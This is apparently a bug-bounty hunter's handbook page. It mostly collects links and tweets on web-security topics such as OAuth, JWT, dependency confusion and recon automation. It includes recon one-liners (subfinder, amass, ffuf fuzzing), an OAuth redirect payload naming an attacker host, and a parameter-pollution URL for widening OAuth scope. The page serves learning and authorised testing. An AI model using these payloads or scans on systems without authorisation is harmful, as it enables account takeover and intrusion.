{% embed url="<https://twitter.com/x0rz/status/1037626490790326273>" %}

You can use $timeout command in linux to exit the bash command if it doesn't finishes in time X \
\
Example: \
\
$timeout 2 cat \*.txt \
\
If [$cat](https://twitter.com/search?q=%24cat\&src=ctag) commane doesn't finishes in 2 seconds it will kill the command. Usefull while automation.

* <https://madaidans-insecurities.github.io/guides/linux-hardening.html>

{% embed url="<https://twitter.com/DissectMalware/status/1073785021029343232?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1073939531731210240%7Ctwcon%5Etimelinechrome&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1073939531731210240>" %}

port forwarding - <https://unix.stackexchange.com/questions/115897/whats-ssh-port-forwarding-and-whats-the-difference-between-ssh-local-and-remot>

**$** alias s="du -hs \* | sort -rh | head -5"

* [What are some good resource/projects to learn Linux basics?](https://twitter.com/cyberashx/status/1272593657670008832?s=20)


# Email Related

* <https://twitter.com/3XS0/status/1297270601661526016>
* <https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>
* <http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate>
* <https://twitter.com/intigriti/status/1078318258661531648?lang=en>
* <https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68>
* <https://yashswarup12.medium.com/how-the-use-of-hidden-form-fields-lead-to-email-verification-bypass-3c8d7c25bd31>

{% embed url="<https://twitter.com/nixintel/status/1395386791700668416?s=20>" %}

{% embed url="<https://twitter.com/securinti/status/1408177629199540225?s=20>" %}

{% embed url="<https://twitter.com/SammamQureshi/status/1472999288322068486?s=20>" %}


# Dependency confusion

{% embed url="<https://twitter.com/vismaprodsec/status/1359468412653690880?s=20>" %}

{% embed url="<https://twitter.com/tuhin1729_/status/1434608076150099968?s=20>" %}

{% embed url="<https://twitter.com/DhiyaneshDK/status/1434444238100434950?s=20>" %}

{% embed url="<https://t.co/E7bRwxsnS4?amp=1>" %}

{% embed url="<https://redhuntlabs.com/blog/dependency-confusion-attack-what-why-and-how.html>" %}

* <https://0xsapra.github.io/website//Exploiting-Dependency-Confusion>


# Nginx Misconfigs

{% embed url="<https://twitter.com/naglinagli/status/1401259603845918722?s=20>" %}

{% embed url="<https://twitter.com/securisec/status/1131720542694858758?s=20>" %}

{% embed url="<https://twitter.com/KacperSzurek/status/1232575905370865664?s=20>" %}

{% embed url="<https://twitter.com/fransrosen/status/1362437752504147969?s=20>" %}

{% embed url="<https://twitter.com/_r_netsec/status/1397367661546205190?s=20>" %}


# JIRA

<https://www.doyler.net/security-not-included/jira-username-enumeration>


# OAUTH

![](/files/-Mkp951MqgzGhUSiG08N)

<https://shreyapohekar.com/blogs/here-is-how-to-hunt-for-oauth-vulnerabilities/>


# Chaining of Bugs

* <https://manasharsh.medium.com/chaining-bugs-for-better-bounties-f14d6b2129de>
* <https://twitter.com/MasterSEC_AR/status/1398421473988169729?s=20>

{% embed url="<https://twitter.com/MasterSEC_AR/status/1398421473988169729?s=20>" %}


# Bug Bounty Automation

{% embed url="<https://gist.github.com/LuD1161/66f30da6d8b6c1c05b9f6708525ea885>" %}

{% embed url="<https://gist.github.com/LuD1161/0a85aef8e27e4a7644fd4b69efb62caa>" %}

* <https://github.com/j3ssie/Osmedeus>
* <https://twitter.com/c0rv4x/status/1131589593944526849>
* <https://github.com/c0rvax/project-black>
* <https://github.com/Mad-robot/Spartan>
* <https://github.com/jaeles-project/jaeles>
* <https://github.com/AlexisAhmed/BugBountyToolkit>
* <https://www.youtube.com/watch?v=9fIhzGj148Y> - video
* <https://github.com/LifeHack3r/Scavenger>
* <https://github.com/yogeshojha/rengine>
* <https://github.com/0xdekster/ReconNote>
* <https://github.com/AlexisAhmed/BugBountyToolkit>
* <https://github.com/Anon-Exploiter/subdomainsEnumerator>
* <https://github.com/ShutdownRepo/Exegol>
* <https://hub.docker.com/r/ca3s1m/bugbounty-toolkit>
* <https://github.com/AvasDream/pentesting-dockerfiles>
* <https://github.com/pry0cc/axiom>
* <https://github.com/harsh-bothra/Bheem>
* <https://github.com/rockybhai0516/maha/blob/main/maha.sh>
* <https://github.com/Mad-robot/Spartan>
* <https://github.com/x1mdev/ReconPi>
* <https://github.com/six2dez/reconftw>
* <https://sidxparab.medium.com/best-bugbounty-recon-toolebe635d3b363-ebe635d3b363>
* <https://github.com/dreamer1eh/ultimate_bughunter_tools>
* <https://github.com/intelowlproject/IntelOwl>
* <https://github.com/Cyber-Guy1/BlackDragon>
* <https://github.com/storenth/lazyrecon>

```
Rengine:-
An automated recon framework for web applications
https://github.com/yogeshojha/rengine

Jaeles:-
Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.
https://github.com/jaeles-project/jaeles

DeepExploit:-
Fully automatic penetration test tool using Deep Reinforcement Learning.
https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit

SAIVS:-
Spider Artificial Intelligence Vulnerability Scanner.
https://github.com/13o-bbr-bbq/SAIVS

GyoiThon:-
GyoiThon is Intelligence Gathering tool for Web Server.
https://github.com/gyoisamurai/GyoiThon

DeepGenerator:-
Fully automatically generate injection codes for web application assessment using Genetic Algorithm and Generative Adversarial Networks.
https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator

PyRecommender:-
PyRecommender can recommend optimal injection code for detecting web app vulnerabilities.
https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Recommender
```

{% embed url="<https://twitter.com/shivangx01b/status/1340891880368689152?s=20>" %}

![](/files/-Mj89oy0BajIXCaRSHNd)

{% embed url="<https://twitter.com/IamRenganathan/status/1432759828863074307?s=20>" %}

* <https://www.oreilly.com/content/automating-xss-detection-in-the-ci-cd-pipeline-with-xss-checkmate/>


# Mindmaps

* <https://github.com/imran-parray/Mind-Maps>
* <https://www.xmind.net/m/2QyGbx/>

![](/files/-MJhLLXvxhv8crDxWXfv)

![](/files/-MJhLWLcFvt5nHEq4U-s)

![https://t.co/GKqSFNPimt?amp=1](/files/-MJhNsnHrh5nVITpeDSl)

![https://twitter.com/ITSecurityguard/status/1306278129531486208/photo/1](/files/-MJhO7IqpFVikgarmThj)

![https://hacktify.in/mindmap.png](/files/-MJhOPRUBunTrMSiyYsT)

1. <https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html>

![https://twitter.com/Musab1995/status/1317071523946127361](/files/-MJmLzQUiwpvIh5fdWTk)

![](/files/-MSfi6Z5_7xskKQ-5WQY)

![https://twitter.com/ceos3c/status/1275324236601712640?s=20](/files/-MT4JcKcD-NU72TsMwEQ)

![https://twitter.com/A9HORA/status/1293907228307513347?s=20](/files/-MTAEgoP5YKFo-MXQQ7U)

![https://twitter.com/texas\_journey/status/1294107651434061824?s=20](/files/-MTAFG7LTmen1MVzrMeu)

![](/files/-MTG-QlU3LiYH66feoqo)

![https://blog.it-securityguard.com/patriks-bug-bounty-tools-%f0%9f%9b%a0%ef%b8%8f/](/files/-MTeQ1jYkiVvR9vdMOHb)

![https://twitter.com/M4yFly/status/1306631179831894017](/files/-MTeR5rVf_mTCA3hpx5E)

![](/files/-MWFfQXhuXN49nnBAB8w)


# Oneliner Collections

**Links:**

* <https://github.com/OfJAAH/KingOfBugBountyTips>
* <https://github.com/dwisiswant0/awesome-oneliner-bugbounty>
* <https://github.com/twseptian/oneliner-bugbounty>

Content Discovery:

```
mkdir -p subs assets
subfinder -d example.com -all -nW -o subs/subfinder.txt
assetfinder -subs-only -d example.com | tee subs/assetfinder.txt
amass enum -d example.com -o subs/amass.txt
#run other subdomain tools if you want.
cat subs/*txt | sort -u > subs/all.txt

#Look for alive subdomains.
cat subs/all.txt | httpx -o assets/subs.txt

#Now let's find more assets.
cat assets/subs.txt | feroxbuster --stdin -e -w {put some good wordlist here} | tee assets/feroxbuster.txt
#For the wordlist i recomend OneListForAll: https://github.com/six2dez/OneListForAll
```

Simple script to look for juice endpoints with gau and gf

![](/files/-MT4EGAuDlj-hi4g48PH)

```
DNS Recon and Fuzzing with FFUF in one line Fisted hand

curl -s https://crt.sh\?q\=\%.$1\&output\=json | jq -r '.[].name_value' | gsed 's/^/https:\/\//' | sort -u | xargs -n 1 -I{} ffuf -w ~/common.txt -u {}/FUZZ -t 70 > fuzzing_domain.txt

```

![https://twitter.com/hex0x42424242/status/1299431571792027650?s=20](/files/-MTFzVir-jnI3fY8pIR-)

{% embed url="<https://twitter.com/Alra3ees/status/1299575912367902721?s=20>" %}

{% embed url="<https://twitter.com/Alra3ees/status/1356015561885556739?s=20>" %}

{% embed url="<https://twitter.com/panch0r3d/status/1441861036441747456?s=20>" %}

{% embed url="<https://twitter.com/remonsec/status/1441617313250172930?s=20>" %}

{% embed url="<https://twitter.com/Alra3ees/status/1393188422156800005?s=20>" %}

{% embed url="<https://twitter.com/Alra3ees/status/1356015561885556739?s=20>" %}


# Red Teaming

* <https://medium.com/@dmchell/what-ive-learned-in-over-a-decade-of-red-teaming-5c0b685c67a2?source=linkShare-5a3b3215bf62-1577534523>
* <https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team>

{% embed url="<https://twitter.com/sajal_thomas/status/1292438212829298688?s=20>" %}

{% embed url="<https://twitter.com/binitamshah/status/1427245677822631945?s=20>" %}

{% embed url="<https://twitter.com/LearnerHunter/status/1474018725443506179?s=20>" %}

{% embed url="<https://twitter.com/aidenpearce369/status/1470266903545348099?s=20>" %}


# Blue Teamining

* <https://www.blueteamsacademy.com/>


# Recon One Liners

* [Just Finish a Multiple FFUF and playing with RUSHrush -i /opt/recon/xxx/hostsAlive -j 10 'ffuf -o $(echo {} | unfurl domains) -w /opt/SecLists/Discovery/Web-Content/raft-large-files.txt -u "{}/FUZZ" -sf -ignore-body -mc 200 -t 300' #bugbountyt](https://twitter.com/zeroc00I/status/1303813767210377217?s=20)[ips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click)
* [subfinder -nW -silent -t 25 -d $DOMAIN | shuffledns -silent -d $DOMAIN -r $RESOLVER | wildcheck -t 100 | awk '{print $3}' | dnsprobe -t 350 -f domain Some crazy oneliners possible for subdomain discovery](https://twitter.com/sprocket_ed/status/1248050484792852480?s=20)

{% embed url="<https://twitter.com/harshbothra_/status/1270404745451106310?s=20>" %}


# Misc

{% embed url="<https://twitter.com/ThisIsDK999/status/1361298477783805952?s=20>" %}

* <https://gccybermonks.com/posts/popups/>
* <https://www.mannulinux.org/2021/03/from-tikiwiki-to-domain-admin-journey.html>
* <https://blog.cryptohack.org/twitter-secrets>
* <https://bdgajera.medium.com/ssrf-if-the-application-renders-csv-bd56c4cbea6c>
* <https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/>
* <https://www.hahwul.com/2020/12/24/toctou-ssrf/>
* <https://github.com/minimaxir/big-list-of-naughty-strings>
* <https://mr-msa.notion.site/mr-msa/Write-ups-Tips-0b10fa38dc64499192dcf8df8ec56da9>

```
SSL Pinning - 
https://www.youtube.com/watch?v=is8lHjEkk7U


How http works ?

How SSL / TLS works ?


How DNS Works ?


How OAUTH works ?

https://twitter.com/s0md3v/status/1168846854689132544


https://twitter.com/hackerscrolls/status/1269266750467649538


https://blog.avuln.com/article/4


https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/


https://webstersprodigy.net/2013/05/09/common-oauth-issue-you-can-use-to-take-over-accounts/


https://research.nccgroup.com/2020/07/07/an-offensive-guide-to-the-authorization-code-grant/


https://www.youtube.com/watch?v=O762qjAjAyo&list=PLnICOE3KiEs9J65ndHOeOYDiyA7FhI1g9&index=6&t=0s


https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html


https://medium.com/@apkash8/oauth-and-security-7fddce2e1dc5


https://medium.com/@lokeshdlk77/bypass-oauth-nonce-and-steal-oculus-response-code-faa9cc8d0d37


https://t.co/FYJdf7Z6nG?amp=1

Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues. What worked was... \udfff -> � -> ? Therefore... {"redirectUri":"https://attacker\udfff@[victim]/"} Equals... Location: https://attacker?@[victim]/ - 
https://twitter.com/samwcyo/status/1246997498981494784


https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/


Got my 1st HTTP Parameter Pollution (HPP) bug rewarded! Targeting an OAuth login: by providing url parameter "scope" twice, the page asked confirmation for the first, but ended up authorizing all others too:


/oauth?redirect=x&response_type=code&client_id=x&scope=name&scope=email


https://www.hackedu.com/blog/analysis-of-common-federated-identity-protocols-openid-connect-vs-oauth-2.0-vs-saml-2.0


https://twitter.com/apisecurityio/status/1283023445081509888?s=20



Certificate Transparency:

https://www.digicert.com/certificate-transparency/how-it-works.htm


http://www.certificate-transparency.org/how-ct-works


https://medium.com/babylon-engineering/android-security-certificate-transparency-601c18157c44




HTTP headers 



https://www.federacy.com/blog/security-headers-the-whys-and-hows/


https://zgheb.com/i?v=blog&pl=46#sh_acao


https://blog.initd.sh/others-attacks/web-application/http-security-headers-detailed-explanation/


https://www.youtube.com/watch?v=eDauBJUthRo


https://int64software.com/blog/2018/11/05/hardening-website-security-part-1-http-security-headers/


https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/


https://medium.com/@Johne_Jacob/7-security-response-headers-every-security-tester-should-know-77576ffdfc0f


https://www.scip.ch/en/?labs.20180809


```

CSP - <https://csper.io/blog/other-csp-security>

CSP - <https://www.youtube.com/watch?v=c3JjTRFl5D8&t=0s&list=PLv-PXy2JVvivzOKjt7_jA8NnIifCnRjOS&index=15>

JWT:

```
https://zonksec.com/blog/jwt-hacking-101/
https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
https://www.slideshare.net/snyff/jwt-insecurity
https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/
https://www.shawarkhan.com/2019/01/hijacking-accounts-by-retrieving-jwt.html
https://medium.com/@blackhood/simple-jwt-hacking-73870a976750
https://github.com/dwyl/learn-json-web-tokens
https://habr.com/en/post/450054/
https://gist.github.com/pranav1hivarekar/65e59cb95d56acf02ffdaf17b25f4039
https://www.youtube.com/watch?v=rCkDE2me_qk
https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781
https://www.scip.ch/en/?labs.20190523
https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/
https://badshah.io/pentesting-jwt-tokens/
https://www.owasp.org/images/0/07/20190222--Nyffenegger-JWAT.pdf
https://www.youtube.com/watch?v=sGvF8wS76Dk
https://www.youtube.com/watch?v=aYz8yPymyvk
http://intx0x80.blogspot.com/2019/10/JWT.html
https://mazinahmed.net/blog/breaking-jwt/
https://research.securitum.com/jwt-json-web-token-security/
https://github.com/ticarpi/jwt_tool/wiki
https://www.youtube.com/watch?v=nM8kibRciJQ
https://www.youtube.com/watch?v=M3jA0bGDCso&feature=emb_logo
https://youtu.be/zWVRHK3ykfo
https://youtu.be/558MFgH1t9g
https://t.co/Su15R6Vpps?amp=1
https://github.com/dwyl/learn-json-web-tokens
https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/
```

OAUTH / SAML -&#x20;

```
https://medium.com/securing/what-is-going-on-with-oauth-2-0-and-why-you-should-not-use-it-for-authentication-5f47597b2611

https://habr.com/en/post/449182/



How to Hunt Bugs in SAML; a Methodology - Part I
https://www.anitian.com/owning-saml/


The most common OAuth 2.0 Hacks - https://habr.com/en/post/449182/

http://blog.intothesymmetry.com/2015/12/top-10-oauth-2-implementation.html

https://twitter.com/fyoorer/status/1190304570506911744

https://medium.com/swlh/hacking-saml-bce30483d020

https://medium.com/@wdevon99/what-the-hell-is-oauth-6ba19f236612

https://twitter.com/s0md3v/status/1168846854689132544

https://twitter.com/fuxksniper/status/1297092959544856576
```

{% embed url="<https://carbon.now.sh/>" %}

SAML - <https://twitter.com/Alra3ees/status/1259969808969469954>

nmap - <https://twitter.com/JaneScott/status/1072291481728167936?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1073939531731210240%7Ctwcon%5Etimelinechrome&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1073939531731210240>

{% embed url="<https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf>" %}

I built a tool to turn[@nmap](https://twitter.com/nmap) scan data into a sortable table for easier consumption. ([https://github.com/jgamblin/nmaptable/…](https://t.co/2pehCY9hLk?amp=1)) Demo: [https://jgamblin.github.io/nmap.html](https://t.co/hxNN3MObR6?amp=1)

\---Nmap Trick Techniques [#BugBountry](https://twitter.com/hashtag/BugBountry?src=hashtag_click) [https://blog.urfix.com/10-cool-nmap-tricks-techniques/amp/#click=https://t.co/IzRXAg7CiQ](https://t.co/3hi67aqUiS?amp=1)

{% embed url="<https://twitter.com/cnotin/status/1088122067952828416?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1088406074103865346%7Ctwcon%5Etimelinechrome&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1088406074103865346>" %}

* How to defend your website with ZIP bombs : - <https://twitter.com/binitamshah/status/882977758380310529>
* A pretty old bug in Yahoo! [https://medium.com/@uranium238/co](https://t.co/43tnWhhwe3?amp=1)
* New blog post about bypassing payments using webhooks: [https://lightningsecurity.io/blog/bypassing-payments-using-webhooks/…](https://t.co/wpLyUFjzd6?amp=1) [#bugbounty](https://twitter.com/hashtag/bugbounty?src=hashtag_click)
* Some nice writeup you should read it. [http://blog.jr0ch17.com/tags/#smtp%20header%20injection…](https://t.co/7eBRaHJrlS?amp=1)356115
* Chaining - <https://web.archive.org/web/20190407101215/https://nahamsec.com/chaining-multiple-vulnerabilities-to-gain-admin-access/>
* <https://github.com/bb1nfosec/Information-Security-Tasks/tree/master/Web>
* <https://medium.com/@masonhck357/chains-on-chains-chaining-multiple-low-level-vulns-into-a-critical-8b88db29738e>

Host Header -&#x20;

* <https://hackerone.com/reports/317476>
* [https://hackerone.com/reports/123078](https://t.co/Ui9rqQZgUF?amp=1) [https://hackerone.com/reports/167631](https://t.co/LQsaWoQWzZ?amp=1) [https://hackerone.com/reports/226659](https://t.co/5ybE4y4X0i?amp=1) [https://hackerone.com/reports/229498](https://t.co/yGZlnhGpFr?amp=1) [https://hackerone.com/reports/244677](https://t.co/MCazG7foUT?amp=1) [https://hackerone.com/reports/281575](https://t.co/RJ5MctEwDO?amp=1) [https://hackerone.com/reports/317476](https://t.co/LuwkhrQn9s?amp=1) [https://hackerone.com/reports/698416](https://t.co/iSg4meA3Ur?amp=1) [https://hackerone.com/reports/791293](https://t.co/XRN7cUSL9D?amp=1)

Post Msg - <https://medium.com/bugbountywriteup/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc>


# Wordpress

* <https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/>


# Fuzzing / FuFF

{% embed url="<https://twitter.com/Alra3ees/status/1361806776325316616?s=20>" %}


# OWASP ZAP

This Page will contain OWASP ZAP related Stuffs

{% embed url="<https://twitter.com/Th3_Druk/status/1103213214505029638?s=20>" %}

{% embed url="<https://twitter.com/zaproxy/status/1470037870878638080?s=20>" %}

{% embed url="<https://twitter.com/xer0dayz/status/1301187960721698817?s=20>" %}

{% embed url="<https://twitter.com/opexxx/status/1235341673888088064?s=20>" %}

{% embed url="<https://twitter.com/tbbhunter/status/1251256241361477639?s=20>" %}

* <https://twitter.com/busk3r/status/1429792287593144323?s=20>
* <https://twitter.com/hahwul/status/1423682177577799683?s=20>
* <https://twitter.com/clintgibler/status/1348721353285890048?s=20>
* <https://twitter.com/zaproxy/status/1237032286383734788?s=20>


# Bug List

{% embed url="<https://twitter.com/Shre_yy/status/1367310349892952066?s=20>" %}

![](/files/-Mkx4yvEYBprmYBi5Cp8)

{% embed url="<https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md>" %}

![](/files/-Mkx8xryFTRM22Kn8JIn)

![](/files/-Mkx937HzH7ALCwtfTeD)

{% embed url="<https://www.mindmeister.com/1349784699/web-application-security?fullscreen=1>" %}

{% embed url="<https://twitter.com/John_Karacz/status/1406052304076300289?s=20>" %}


# Setting up burp collaborator

* <https://blog.fabiopires.pt/running-your-instance-of-burp-collaborator-server/>
* <https://portswigger.net/burp/documentation/collaborator/deploying>
* <https://infosecwriteups.com/setup-your-private-burp-collaborator-for-ssrf-xxe-fd6cf01c8ca>
* <https://honoki.net/2021/07/11/wilson-cloud-respwnder/>


# Admin Panel PwN

{% embed url="<https://twitter.com/hunter0x1/status/1395250783977762819?s=20>" %}


# Credential Stuffing / Dump / HaveibeenPwned?

{% embed url="<https://twitter.com/nnwakelam/status/1364754438489956356?s=20>" %}




---

[Next Page](/bughunter-handbook/llms-full.txt/1)

